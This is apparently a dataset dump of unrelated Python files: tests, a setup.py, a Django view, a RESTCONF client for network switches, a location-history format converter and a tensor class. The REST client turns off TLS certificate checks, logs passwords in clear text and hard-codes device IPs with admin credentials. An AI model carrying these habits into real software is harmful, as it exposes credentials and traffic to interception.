        for i in range(n):
            name = "id_" + str(i)
            index = matrix.add_row(name)
            name_obtained = matrix.get_row_name(i)
            self.assertEqual(name, name_obtained)
| StarcoderdataPython |
3274350 | #!/usr/bin/env python
from setuptools import setup
import os
package_name = 'fht'
# Bundle any prebuilt shared objects (compiled extensions) found in the package dir.
files_so = [t for t in os.listdir(package_name) if t.endswith('.so')]
print(files_so)
setup(name='fht',
      version='0.1',
      description='fast hankel transform',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      packages=['fht'],
      package_dir={'': '.'},
      # Ship the discovered .so files alongside the Python sources.
      package_data={'': files_so},
      install_requires=[
          'scipy',
          'numpy',
          'matplotlib',
      ],
      # Native extensions cannot run from a zipped egg.
      zip_safe=False)
| StarcoderdataPython |
3212126 | # -*- coding: utf-8 -*-
from django.views.generic import ListView
from .models import Post
class PostListView(ListView):
    """Generic list view over all Post objects; relies entirely on ListView defaults."""
    model = Post
| StarcoderdataPython |
3227362 | import spya
from os import path as op
def test_paths():
    """paths() joins segments with the platform path separator."""
    path = spya.paths('.', 'tests')
    assert path == '.' + op.sep + 'tests'
def test_exists():
    """exists() reports True for this test file itself."""
    assert True == spya.exists(__file__)
def test_isfile():
    """isfile() reports True for this test file itself."""
    assert True == spya.isfile(__file__)
def test_isdir():
    """isdir() reports True for the directory containing this file."""
    dirname = spya.dirname(__file__)
    assert True == spya.isdir(dirname)
def test_dirname():
    """dirname() agrees with os.path.dirname."""
    dirname = op.dirname(__file__)
    assert dirname == spya.dirname(__file__)
def test_basename():
    """basename() returns the file name including its extension."""
    assert 'test___init__.py' == spya.basename(__file__)
def test_filename():
    """filename() returns the file name without its extension."""
    assert 'test___init__' == spya.filename(__file__)
def test_extension():
    """extension() returns the suffix including the leading dot."""
    assert '.py' == spya.extension(__file__)
def test_getsize():
    """getsize() returns a (non-None) size for an existing file."""
    assert spya.getsize(__file__) is not None
| StarcoderdataPython |
77408 | import os
import glob
import requests
import warnings
import jsonpatch
from jinja2 import Environment
from spytest.dicts import SpyTestDict
from utilities import common as utils
from utilities import json_helpers as json
class Rest(object):
    """Minimal RESTCONF client used to exercise a device's REST interface.

    Wraps a ``requests`` session with credential fall-back handling,
    renders Jinja2/JSON request templates and applies them, logging every
    request/response pair.
    """

    def __init__(self, logger=None):
        # Base URL may come from the environment until reinit() is called.
        self.base_url = os.getenv("SPYTEST_REST_TEST_URL")
        self.session = None
        self.logger = logger
        self.timeout = 1  # seconds per HTTP request
        self.protocol = "https"
        self.ip = None
        self.username = None
        self.password = None
        self.altpassword = None
        self.curr_pwd = None  # the password that actually authenticated
        self.cli_data = SpyTestDict()

    def reinit(self, ip, username, password, altpassword):
        """Re-target the client at *ip* and probe which password works.

        Returns self so calls can be chained.
        """
        self.ip = ip
        self.base_url = "{}://{}".format(self.protocol, ip)
        try:
            self._set_auth(username, password, altpassword)
        except Exception:
            # Best effort: a failed probe here will simply surface on the
            # first real request instead.
            pass
        return self

    def reset_curr_pwd(self):
        """Forget the verified password so the next _set_auth() re-probes."""
        self.curr_pwd = None

    def _set_auth(self, username, password, altpassword):
        """Determine which of the candidate passwords the device accepts.

        When both candidates are given, each is tried (up to 3 attempts)
        against a known RESTCONF path; the first one answering 200 wins.
        """
        self.username = username
        if not self.curr_pwd:
            if password and altpassword:
                self.password = password
                self.altpassword = altpassword
                for pwd in [password, altpassword]:
                    tmp_session = self._get_session()
                    tmp_session.auth = (self.username, pwd)
                    tmp_session.verify = False
                    tmp_url = self._get_url("/restconf/data/openconfig-system:system")
                    iter_count = 3
                    while iter_count > 0:
                        iter_count -= 1
                        try:
                            retval = tmp_session.get(tmp_url, verify=False, timeout=self.timeout)
                            self._log("Using '{}' '{}' : '{}'".format(username, pwd, retval.status_code))
                            if retval.status_code == 200:
                                self.curr_pwd = pwd
                                break
                        except Exception as e:
                            self._log("Exception '{}' '{}' : '{}'".format(username, pwd, e))
                    if self.curr_pwd:
                        break
            elif password:
                self.password = password
                self.curr_pwd = password
            elif altpassword:
                # Only the alternate password is available; use it directly.
                self.altpassword = altpassword
                self.curr_pwd = altpassword
        # NOTE(review): this logs credentials in clear text.
        msg = "Rest details '{}' '{}' '{}' '{}' '{}'".format(
            self.ip, self.username, self.password, self.altpassword, self.curr_pwd)
        self._log(msg)

    def _create_session(self):
        """Build a fresh requests session with YANG-JSON headers and auth."""
        self.session = requests.session()
        self.headers = {"Accept": "application/yang-data+json",
                        "Content-type": "application/yang-data+json"}
        self.session.headers.update(self.headers)
        if self.curr_pwd:
            self.session.auth = (self.username, self.curr_pwd)
        self.session.verify = False
        warnings.filterwarnings('ignore', message='Unverified HTTPS request')

    def _get_credentials(self):
        """Return [username, verified password]."""
        return [self.username, self.curr_pwd]

    def _get_session(self):
        # A fresh session is created on every call so credential changes
        # made by reinit()/_set_auth() always take effect.
        self._create_session()
        return self.session

    def _log(self, msg):
        # Fall back to stdout when no logger is attached.
        if self.logger:
            self.logger.debug(msg)
        else:
            print(msg)

    def _dump(self, data):
        """Log *data* as JSON."""
        self._log(json.dumps(data))

    def _get_url(self, path, *args, **kwargs):
        """Build ``<base>/<path>[/k=v,...][ /arg ...]``.

        Keyword values get spaces percent-escaped; value-less keywords are
        appended bare. Positional *args* become extra path components.
        """
        params = []
        for key, value in kwargs.items():
            if value:
                value = value.replace(" ", "%20")
                params.append('{}={}'.format(key, value))
            else:
                params.append(key)
        if path.startswith("/"):
            path = path[1:]
        if params:
            url = "{}/{}/{}".format(self.base_url, path, ",".join(params))
        else:
            url = "{}/{}".format(self.base_url, path)
        for entry in args:
            url = "{}/{}".format(url, entry)
        return url

    def _json(self, retval, default=None):
        """Decode the response body; return *default* ({} if omitted) on failure."""
        # None sentinel instead of a shared mutable {} default.
        if default is None:
            default = {}
        try:
            return retval.json()
        except Exception as exp:
            print(utils.stack_trace(exp))
            return default

    def _result(self, operation, retval, inp):
        """Pack a response into a SpyTestDict and log it."""
        resp = SpyTestDict()
        resp.url = retval.url
        resp.operation = operation
        resp.status = retval.status_code
        resp.input = inp
        resp.output = self._json(retval)
        self._log(json.dumps(resp))
        return resp

    def post(self, path, data, *args, **kwargs):
        """HTTP POST JSON-encoded *data* to *path*."""
        session = self._get_session()
        try:
            url = self._get_url(path, *args, **kwargs)
            retval = session.post(url, json.dumps(data), verify=False, timeout=self.timeout)
            return self._result("POST", retval, data)
        except Exception as e:
            print(e)
            raise

    def put(self, path, data, *args, **kwargs):
        """HTTP PUT JSON-encoded *data* to *path*."""
        session = self._get_session()
        try:
            url = self._get_url(path, *args, **kwargs)
            retval = session.put(url, json.dumps(data), verify=False, timeout=self.timeout)
            return self._result("PUT", retval, data)
        except Exception as e:
            print(e)
            raise

    def patch(self, path, data, *args, **kwargs):
        """HTTP PATCH JSON-encoded *data* to *path*."""
        session = self._get_session()
        try:
            url = self._get_url(path, *args, **kwargs)
            retval = session.patch(url, json.dumps(data), verify=False, timeout=self.timeout)
            return self._result("PATCH", retval, data)
        except Exception as e:
            print(e)
            raise

    def delete(self, path, *args, **kwargs):
        """HTTP DELETE *path*."""
        session = self._get_session()
        try:
            url = self._get_url(path, *args, **kwargs)
            retval = session.delete(url, verify=False, timeout=self.timeout)
            return self._result("DELETE", retval, None)
        except Exception as e:
            print(e)
            raise

    def get(self, path, *args, **kwargs):
        """HTTP GET *path*."""
        session = self._get_session()
        try:
            url = self._get_url(path, *args, **kwargs)
            retval = session.get(url, verify=False, timeout=self.timeout)
            return self._result("GET", retval, None)
        except Exception as e:
            print(utils.stack_trace(e))
            raise

    def parse(self, filepath=None, all_sections=False, paths=None, **kwargs):
        """Render a Jinja2/JSON template file into SpyTestDict structures.

        ``file::block`` syntax renders just that template block. With
        *all_sections* True every block is rendered into a dict keyed by
        block name; otherwise the whole file is rendered at once.
        """
        assert filepath, "File Path must be provided"
        # None sentinel instead of a mutable [] default.
        if paths is None:
            paths = []
        root = None
        if "::" in filepath: [filepath, root] = filepath.split("::", 2)
        if not isinstance(paths, list) and isinstance(paths, str):
            paths = [paths]
        filepath = utils.find_file(filepath, paths)
        text = "\n".join(utils.read_lines(filepath))
        tmpl = Environment().from_string(text)
        if root:
            block = tmpl.blocks[root]
            text = "\n".join(block(tmpl.new_context(kwargs)))
            return json.fix(text, "Invalid json file supplied", True, object_pairs_hook=SpyTestDict)
        if not all_sections or not tmpl.blocks:
            text = Environment().from_string(text).render(**kwargs)
            return json.fix(text, "Invalid json file supplied", True, object_pairs_hook=SpyTestDict)
        retval = SpyTestDict()
        for root in tmpl.blocks:
            block = tmpl.blocks[root]
            text = "\n".join(block(tmpl.new_context(**kwargs)))
            retval[root] = json.fix(text, "Invalid json file supplied", True, object_pairs_hook=SpyTestDict)
        return retval

    def load_cli(self, filepath):
        """Load the REST-to-CLI mapping file and print every known command."""
        self.cli_data = self.parse(filepath)
        for req_list in self.cli_data.values():
            for req in req_list:
                for key, cli in req.items():
                    print("{} -- {} -- {}".format(cli.view, cli.cmd, key))

    def search_cli(self, key):
        """Return the CLI entry registered for *key*, or None."""
        for req_list in self.cli_data.values():
            for req in req_list:
                if key in req:
                    return req[key]
        return None

    def search_cli_data(self, data):
        # Debug aid: dump the payload that failed to map to a CLI command.
        print(json.dumps(data))

    def cli(self, request, sections=None, operations=None):
        """Translate REST request entries into their CLI equivalents (debug aid)."""
        retval = SpyTestDict()
        map_operations={"create":"post", "read":"get", "update":"put", "modify":"patch", "delete":"delete"}
        if operations: operations = utils.make_list(operations)
        for ent in utils.make_list(request):
            key = ent.path.replace("/restconf/data", map_operations[ent.operation])
            key = key.replace("-", "_").replace(":", "_").replace("/", "_")
            cli = self.search_cli(key)
            if not cli:
                print("Rest2CLI Fail: {} {}".format(key, ent.path))
                # NOTE(review): 'request' may be a list here; this looks like
                # it was meant to be 'ent.data' -- confirm before changing.
                self.search_cli_data(request.data)
                continue
            print("Rest2CLI PASS: {} {}".format(key, cli.cmd))
        return retval

    def apply(self, request, sections=None, operations=None, ui="rest"):
        """Execute a list of request entries and collect per-entry results.

        Each entry supplies operation/path/data/instance; 'verify' entries
        diff the GET output against the expected data with jsonpatch.
        """
        if ui == "cli": return self.cli(request, sections, operations)
        retval = SpyTestDict()
        if operations: operations = utils.make_list(operations)
        for index, ent in enumerate(utils.make_list(request)):
            enable = ent.get("enable", 1)
            if not enable: continue
            operation = ent["operation"]
            if operations and operation not in operations: continue
            instance = ent.get("instance", dict())
            data = ent.get("data", dict())
            path = ent.get("path", "")
            name = ent.get("name", "{}".format(index))
            if operation == "read" or operation == "get":
                retval[name] = self.get(path, **instance)
            elif operation == "configure" or operation == "patch":
                retval[name] = self.patch(path, data, **instance)
            elif operation == "unconfigure" or operation == "delete":
                retval[name] = self.delete(path, **instance)
            elif operation == "post":
                retval[name] = self.post(path, data, **instance)
            elif operation == "put":
                retval[name] = self.put(path, data, **instance)
            elif operation == "verify":
                resp = self.get(path, **instance)
                result = [True, []]
                # Any patch op other than 'add' means the device output
                # deviates from the expected data.
                for pe in jsonpatch.make_patch(data, resp.output):
                    result[1].append(pe)
                    if pe["op"] != "add":
                        result[0] = False
                retval[name] = result
        return retval
if __name__ == "__main__":
    def _main():
        """Render every sample template and apply its non-read sections."""
        client = Rest().reinit("10.52.129.47", "admin", "broadcom", "broadcom2")
        client.load_cli('../datastore/samples/all.cli')
        for filepath in glob.glob('../datastore/samples/*.j2'):
            #if "openconfig-system.j2" not in filepath: continue
            utils.banner("Rest {}".format(filepath), tnl=False)
            sections = client.parse(filepath, all_sections=True)
            for name, section in sections.items():
                if section.operation == "read": continue
                utils.banner("{}::{} {}".format(filepath, name, section.operation), tnl=False)
                client.apply(section, ui="rest")
            break

    def _main2():
        """Single GET against a VXLAN interface, printed to stdout."""
        client = Rest().reinit("10.59.143.100", "admin", "broadcom", "broadcom2")
        url = "/restconf/data/openconfig-interfaces:interfaces"
        print(client.get(url, "openconfig-vxlan:vxlan-if", interface="vtep1"))

    _main2()
| StarcoderdataPython |
1649786 | <filename>ciukune/core/settings/database.py<gh_stars>0
"""Database settings; may be overridden in production."""
from os.path import abspath, dirname, join

# Project base directory: two levels up from this settings module.
BASE_DIR = dirname(dirname(abspath(__file__)))

# Default to a file-based SQLite database under the base directory.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': join(BASE_DIR, 'db.sqlite3'),
    }
}
| StarcoderdataPython |
5424 | <reponame>DavideRuzza/moderngl-window
"""
Registry general data files
"""
from typing import Any
from moderngl_window.resources.base import BaseRegistry
from moderngl_window.meta import DataDescription
class DataFiles(BaseRegistry):
    """Registry resolving requested data files through the configured loaders."""

    settings_attr = "DATA_LOADERS"

    def load(self, meta: DataDescription) -> Any:
        """Load the data resource described by *meta*.

        Args:
            meta (:py:class:`~moderngl_window.meta.data.DataDescription`): the resource description
        Returns:
            Any: The loaded resource
        """
        return super().load(meta)


data = DataFiles()
| StarcoderdataPython |
3231934 | from duty.objects import dp, Event
from duty.utils import ment_user, format_response
from microvk import VkApiResponseException
def user_add(event: Event, typ: str):
    """Kick-and-reinvite the user referenced by the event, reporting progress.

    *typ* names the response template announcing why the user is being
    returned (e.g. manual add vs. ban expiry). Returns 'ok' on success or a
    dict describing the VK error.
    """
    # Resolve the full VK user object for the member being returned.
    user = event.api('users.get', user_ids=event.obj['user_id'])[0]

    def _format(response_name, err=None):
        # Fill the configured response template; the keyword names are the
        # (Russian) placeholders used inside the templates.
        return format_response(
            event.responses[response_name],
            ссылка=ment_user(user), имя=event.chat.name, ошибка=err
        )
    # The chat owner cannot be kicked/re-added; answer with a dedicated message.
    if event.obj['user_id'] == event.db.owner_id:
        event.send(_format('user_ret_self'))
        return 'ok'
    # Post the progress message first; it is edited in place below.
    message_id = event.send(_format(typ))
    try:
        event.api('messages.removeChatUser',
                  chat_id=event.chat.id, user_id=user['id'])
    except VkApiResponseException:
        # User may already be outside the chat; the re-add below still runs.
        pass
    try:
        event.api('messages.addChatUser',
                  chat_id=event.chat.id, user_id=user['id'])
        event.edit_msg(message_id, _format('user_ret_success'))
        return "ok"
    except VkApiResponseException as e:
        # Error code 15 means the bot lacks access to (re)invite the user.
        if e.error_code == 15:
            event.edit_msg(message_id, _format('user_ret_err_no_access'))
        else:
            event.edit_msg(message_id, _format('user_ret_err_vk', e.error_msg))
        return {
            "response":"vk_error",
            "error_code": e.error_code,
            "error_message": e.error_msg
        }
    except Exception:
        # Anything unexpected: report a generic failure to the chat.
        event.edit_msg(message_id, _format('user_ret_err_unknown'))
        return {"response":"error","error_code":"0","error_message":""}
@dp.event_register('addUser')
def add_user(event: Event) -> str:
    """Handle the 'addUser' duty event: re-invite with the manual-add template."""
    return user_add(event, 'user_ret_process')
@dp.event_register('banExpired')
def ban_expired(event: Event) -> str:
    """Handle the 'banExpired' duty event: re-invite with the ban-expiry template."""
    return user_add(event, 'user_ret_ban_expired')
| StarcoderdataPython |
4819476 | <reponame>qsnake/h5py
from h5py import tests
from h5py import *
class TestCreate(tests.HTest):
    """Low-level H5G group creation tests."""

    def setUp(self):
        # Fresh temporary HDF5 file for every test.
        self.fid, self.name = tests.gettemp()

    def tearDown(self):
        import os
        self.fid.close()
        os.unlink(self.name)

    @tests.require(api=18)
    def test_create_anon(self):
        """ (H5G) Anonymous group creation """
        gid = h5g.create(self.fid, None)
        # assertTrue replaces the long-deprecated assert_ alias, which has
        # been removed from modern unittest releases.
        self.assertTrue(gid)
        self.assertIsInstance(gid, h5g.GroupID)
| StarcoderdataPython |
3298788 | <gh_stars>1-10
#!/usr/bin/env python
# Copyright 2012-2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import sys
import json
import math
from argparse import ArgumentParser, ArgumentTypeError
from datetime import datetime
def valid_date(s):
    """argparse type: parse a YYYY-MM-DD string into a datetime.

    Raises ArgumentTypeError so argparse reports a clean usage error.
    """
    try:
        return datetime.strptime(s, "%Y-%m-%d")
    except ValueError:
        raise ArgumentTypeError("Not a valid date: '{0}'.".format(s))
def dateCheck(timestampms, startdate, enddate):
    """Return True when the millisecond timestamp lies inside the optional window."""
    moment = datetime.utcfromtimestamp(int(timestampms) / 1000)
    before_window = bool(startdate) and startdate > moment
    after_window = bool(enddate) and enddate < moment
    return not (before_window or after_window)
def main():
    """Convert a Google Location History JSON export to kml/json/js/csv/gpx.

    Parses command-line arguments, reads the export, optionally filters by
    date window and sorts chronologically, then writes the chosen format.
    """
    arg_parser = ArgumentParser()
    arg_parser.add_argument("input", help="Input File (JSON)")
    arg_parser.add_argument("-o", "--output", help="Output File (will be overwritten!)")
    arg_parser.add_argument("-f", "--format", choices=["kml", "json", "csv", "js", "gpx", "gpxtracks"], default="kml", help="Format of the output")
    arg_parser.add_argument("-v", "--variable", default="locationJsonData", help="Variable name to be used for js output")
    arg_parser.add_argument('-s', "--startdate", help="The Start Date - format YYYY-MM-DD (0h00)", type=valid_date)
    arg_parser.add_argument('-e', "--enddate", help="The End Date - format YYYY-MM-DD (0h00)", type=valid_date)
    arg_parser.add_argument('-c', "--chronological", help="Sort items in chronological order", action="store_true")
    args = arg_parser.parse_args()
    if not args.output: #if the output file is not specified, set to input filename with a diffrent extension
        args.output = '.'.join(args.input.split('.')[:-1]) + '.' + args.format
    if args.input == args.output:
        arg_parser.error("Input and output have to be different files")
        return
    try:
        json_data = open(args.input).read()
    except:
        # NOTE(review): bare except hides the real cause; consider OSError.
        print("Error opening input file")
        return
    try:
        data = json.loads(json_data)
    except:
        print("Error decoding json")
        return
    if "locations" in data and len(data["locations"]) > 0:
        try:
            f_out = open(args.output, "w")
        except:
            print("Error creating output file for writing")
            return
        items = data["locations"]
        # Optional date-window filter, then optional chronological sort.
        if args.startdate or args.enddate:
            items = [ item for item in items if dateCheck(item["timestampMs"], args.startdate, args.enddate) ]
        if args.chronological:
            # NOTE(review): timestampMs is a string; this sorts
            # lexicographically, which is only correct for equal-length values.
            items = sorted(items, key=lambda item: item["timestampMs"])
        # --- JSON / JS output: a minimal {"locations": [...]} document ---
        if args.format == "json" or args.format == "js":
            if args.format == "js":
                # JS output wraps the JSON in a window-global assignment.
                f_out.write("window.%s = " % args.variable)
            f_out.write("{\"locations\":[")
            first = True
            for item in items:
                if first:
                    first = False
                else:
                    f_out.write(",")
                f_out.write("{")
                f_out.write("\"timestampMs\":%s," % item["timestampMs"])
                f_out.write("\"latitudeE7\":%s," % item["latitudeE7"])
                f_out.write("\"longitudeE7\":%s" % item["longitudeE7"])
                f_out.write("}")
            f_out.write("]}")
            if args.format == "js":
                f_out.write(";")
        # --- CSV output: one Time,Latitude,Longitude row per point ---
        if args.format == "csv":
            f_out.write("Time,Latitude,Longitude\n")
            for item in items:
                f_out.write(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%d %H:%M:%S"))
                f_out.write(",")
                # E7 coordinates are degrees scaled by 1e7.
                f_out.write("%s,%s\n" % (item["latitudeE7"] / 10000000, item["longitudeE7"] / 10000000))
        # --- KML output: one Placemark per point ---
        if args.format == "kml":
            f_out.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
            f_out.write("<kml xmlns=\"http://www.opengis.net/kml/2.2\">\n")
            f_out.write(" <Document>\n")
            f_out.write(" <name>Location History</name>\n")
            for item in items:
                f_out.write(" <Placemark>\n")
                # Order of these tags is important to make valid KML: TimeStamp, ExtendedData, then Point
                f_out.write(" <TimeStamp><when>")
                f_out.write(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%dT%H:%M:%SZ"))
                f_out.write("</when></TimeStamp>\n")
                if "accuracy" in item or "speed" in item or "altitude" in item:
                    f_out.write(" <ExtendedData>\n")
                    if "accuracy" in item:
                        f_out.write(" <Data name=\"accuracy\">\n")
                        f_out.write(" <value>%d</value>\n" % item["accuracy"])
                        f_out.write(" </Data>\n")
                    if "speed" in item:
                        f_out.write(" <Data name=\"speed\">\n")
                        f_out.write(" <value>%d</value>\n" % item["speed"])
                        f_out.write(" </Data>\n")
                    if "altitude" in item:
                        f_out.write(" <Data name=\"altitude\">\n")
                        f_out.write(" <value>%d</value>\n" % item["altitude"])
                        f_out.write(" </Data>\n")
                    f_out.write(" </ExtendedData>\n")
                # KML expects longitude,latitude order.
                f_out.write(" <Point><coordinates>%s,%s</coordinates></Point>\n" % (item["longitudeE7"] / 10000000, item["latitudeE7"] / 10000000))
                f_out.write(" </Placemark>\n")
            f_out.write(" </Document>\n</kml>\n")
        # --- GPX output: waypoints ("gpx") or track segments ("gpxtracks") ---
        if args.format == "gpx" or args.format == "gpxtracks":
            f_out.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
            f_out.write("<gpx xmlns=\"http://www.topografix.com/GPX/1/1\" version=\"1.1\" creator=\"Google Latitude JSON Converter\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd\">\n")
            f_out.write(" <metadata>\n")
            f_out.write(" <name>Location History</name>\n")
            f_out.write(" </metadata>\n")
            if args.format == "gpx":
                for item in items:
                    f_out.write(" <wpt lat=\"%s\" lon=\"%s\">\n" % (item["latitudeE7"] / 10000000, item["longitudeE7"] / 10000000))
                    if "altitude" in item:
                        f_out.write(" <ele>%d</ele>\n" % item["altitude"])
                    f_out.write(" <time>%s</time>\n" % str(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%dT%H:%M:%SZ")))
                    f_out.write(" <desc>%s" % datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%d %H:%M:%S"))
                    if "accuracy" in item or "speed" in item:
                        f_out.write(" (")
                        if "accuracy" in item:
                            f_out.write("Accuracy: %d" % item["accuracy"])
                        if "accuracy" in item and "speed" in item:
                            f_out.write(", ")
                        if "speed" in item:
                            f_out.write("Speed:%d" % item["speed"])
                        f_out.write(")")
                    f_out.write("</desc>\n")
                    f_out.write(" </wpt>\n")
            if args.format == "gpxtracks":
                f_out.write(" <trk>\n")
                f_out.write(" <trkseg>\n")
                lastloc = None
                # The deltas below assume input is in chronological or reverse chronological order.
                # If it's not, use the '--chronological' option or uncomment this:
                # items = sorted(data["data"]["items"], key=lambda x: x['timestampMs'], reverse=True)
                for item in items:
                    if lastloc:
                        # Gap in minutes and jump in km since the previous point.
                        timedelta = abs((int(item['timestampMs']) - int(lastloc['timestampMs'])) / 1000 / 60)
                        distancedelta = getDistanceFromLatLonInKm(item['latitudeE7'] / 10000000, item['longitudeE7'] / 10000000, lastloc['latitudeE7'] / 10000000, lastloc['longitudeE7'] / 10000000)
                        if timedelta > 10 or distancedelta > 40:
                            # No points for 10 minutes or 40km in under 10m? Start a new track.
                            f_out.write(" </trkseg>\n")
                            f_out.write(" </trk>\n")
                            f_out.write(" <trk>\n")
                            f_out.write(" <trkseg>\n")
                    f_out.write(" <trkpt lat=\"%s\" lon=\"%s\">\n" % (item["latitudeE7"] / 10000000, item["longitudeE7"] / 10000000))
                    if "altitude" in item:
                        f_out.write(" <ele>%d</ele>\n" % item["altitude"])
                    f_out.write(" <time>%s</time>\n" % str(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%dT%H:%M:%SZ")))
                    if "accuracy" in item or "speed" in item:
                        f_out.write(" <desc>\n")
                        if "accuracy" in item:
                            f_out.write(" Accuracy: %d\n" % item["accuracy"])
                        if "speed" in item:
                            f_out.write(" Speed:%d\n" % item["speed"])
                        f_out.write(" </desc>\n")
                    f_out.write(" </trkpt>\n")
                    lastloc = item
                f_out.write(" </trkseg>\n")
                f_out.write(" </trk>\n")
            f_out.write("</gpx>\n")
        f_out.close()
    else:
        print("No data found in json")
        return
# Haversine formula
def getDistanceFromLatLonInKm(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points (haversine)."""
    earth_radius_km = 6371
    to_rad = math.pi / 180
    dlat = (lat2 - lat1) * to_rad
    dlon = (lon2 - lon1) * to_rad
    sin_half_dlat = math.sin(dlat / 2)
    sin_half_dlon = math.sin(dlon / 2)
    a = sin_half_dlat * sin_half_dlat + \
        math.cos(lat1 * to_rad) * math.cos(lat2 * to_rad) * \
        sin_half_dlon * sin_half_dlon
    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    return earth_radius_km * c
def deg2rad(deg):
    """Convert an angle from degrees to radians."""
    scale = math.pi / 180
    return deg * scale
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
| StarcoderdataPython |
3304212 | import numpy as np
import collections
import itertools as itt
import functools as fct
import warnings
class TensorCommon:
    """ A base class for Tensor and AbelianTensor, that implements some
    higher level functions that are common to the two. Useful also for
    type checking as in isinstance(T, TensorCommon).
    """

    @classmethod
    def empty(cls, *args, **kwargs):
        """Create an uninitialized tensor."""
        return cls.initialize_with(np.empty, *args, **kwargs)

    @classmethod
    def zeros(cls, *args, **kwargs):
        """Create a tensor filled with zeros."""
        return cls.initialize_with(np.zeros, *args, **kwargs)

    @classmethod
    def ones(cls, *args, **kwargs):
        """Create a tensor filled with ones."""
        return cls.initialize_with(np.ones, *args, **kwargs)

    @classmethod
    def random(cls, *args, **kwargs):
        """Create a tensor with uniform random entries in [0, 1)."""
        return cls.initialize_with(np.random.random_sample, *args, **kwargs)

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # Miscellaneous

    def form_str(self):
        """Return a human-readable summary of shape, qhape and dirs."""
        s = "shape: %s\nqhape: %s\ndirs: %s"%(
            str(self.shape), str(self.qhape), str(self.dirs))
        return s

    @staticmethod
    def flatten_shape(shape):
        """Flatten a possibly sector-wise shape into plain integer dims."""
        try:
            return tuple(map(TensorCommon.flatten_dim, shape))
        except TypeError:
            # shape is not iterable: already flat.
            return shape

    @staticmethod
    def flatten_dim(dim):
        """Sum a sector-wise dimension into a single integer."""
        try:
            return sum(dim)
        except TypeError:
            # dim is already a plain integer.
            return dim

    def norm_sq(self):
        """Return the squared Frobenius norm, contracting self with its conjugate."""
        conj = self.conj()
        all_inds = tuple(range(len(self.shape)))
        norm_sq = self.dot(conj, (all_inds, all_inds))
        return np.abs(norm_sq.value())

    def norm(self):
        """Return the Frobenius norm."""
        return np.sqrt(self.norm_sq())

    @classmethod
    def default_trunc_err_func(cls, S, chi, norm_sq=None):
        """Relative Frobenius-norm error of truncating spectrum S to chi values."""
        if norm_sq is None:
            norm_sq = sum(S**2)
        sum_disc = sum(S[chi:]**2)
        err = np.sqrt(sum_disc/norm_sq)
        return err

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # The meat: actual tensor operations

    def to_matrix(self, left_inds, right_inds, dirs=None,
                  return_transposed_shape_data=False):
        """ Transposes left_inds to one side of self and right_inds to
        the other, and joins these indices so that the result is a
        matrix. On both sides, before reshaping, the indices are also
        transposed to the order given in left/right_inds. If one or both
        of left/right_inds is not provided the result is a vector or a
        scalar.

        dirs are the directions of the new indices. By default it is
        [1,-1] for matrices and [1] (respectively [-1]) if only
        left_inds (respectively right_inds) is provided.

        If return_transposed_shape_data is True then the shape, qhape
        and dirs of the tensor after all the transposing but before
        reshaping is returned as well.
        """
        if dirs is None:
            if len(left_inds) > 0 and len(right_inds) > 0:
                dirs = [1,-1]
            elif len(right_inds) > 0:
                dirs = [-1]
            elif len(left_inds) > 0:
                dirs = [1]
            else:
                dirs = []
        result = self.join_indices(left_inds, right_inds, dirs=dirs,
                                   return_transposed_shape_data=\
                                           return_transposed_shape_data)
        if return_transposed_shape_data:
            result, transposed_shape, transposed_qhape, transposed_dirs =\
                    result
        # join_indices does not return a matrix with left_inds as the
        # first index and right_inds as the second, so we may have to
        # transpose.
        if left_inds and right_inds and left_inds[0] > right_inds[0]:
            result = result.swapaxes(1,0)
            if return_transposed_shape_data:
                ts_left = transposed_shape[:len(right_inds)]
                ts_right = transposed_shape[len(right_inds):]
                transposed_shape = ts_right + ts_left
                if transposed_qhape is not None:
                    qs_left = transposed_qhape[:len(right_inds)]
                    qs_right = transposed_qhape[len(right_inds):]
                    transposed_qhape = qs_right + qs_left
                if transposed_dirs is not None:
                    qs_left = transposed_dirs[:len(right_inds)]
                    qs_right = transposed_dirs[len(right_inds):]
                    transposed_dirs = qs_right + qs_left
        if return_transposed_shape_data:
            return result, transposed_shape, transposed_qhape, transposed_dirs
        else:
            return result

    def from_matrix(self, left_dims, right_dims,
                    left_qims=None, right_qims=None,
                    left_dirs=None, right_dirs=None):
        """ The counter part of to_matrix, from_matrix takes in a matrix
        and the dims, qims and dirs lists of the left and right indices
        that the resulting tensor should have. Mainly meant to be used
        so that one first calls to_matrix, takes note of the
        transposed_shape_data and uses that to reshape the matrix back
        to a tensor once one is done operating on the matrix.
        """
        indices = tuple(range(len(self.shape)))
        final_dims = ()
        final_qims = ()
        final_dirs = ()
        if indices:
            if left_dims:
                final_dims += (left_dims,)
                final_qims += (left_qims,)
                final_dirs += (left_dirs,)
            if right_dims:
                final_dims += (right_dims,)
                final_qims += (right_qims,)
                final_dirs += (right_dirs,)
        if left_qims is right_qims is None:
            final_qims = None
        if left_dirs is right_dirs is None:
            final_dirs = None
        return self.split_indices(indices, final_dims, qims=final_qims,
                                  dirs=final_dirs)

    def dot(self, other, indices):
        """ Dot product of tensors. See numpy.tensordot on how to use
        this, the interface is exactly the same, except that this one is
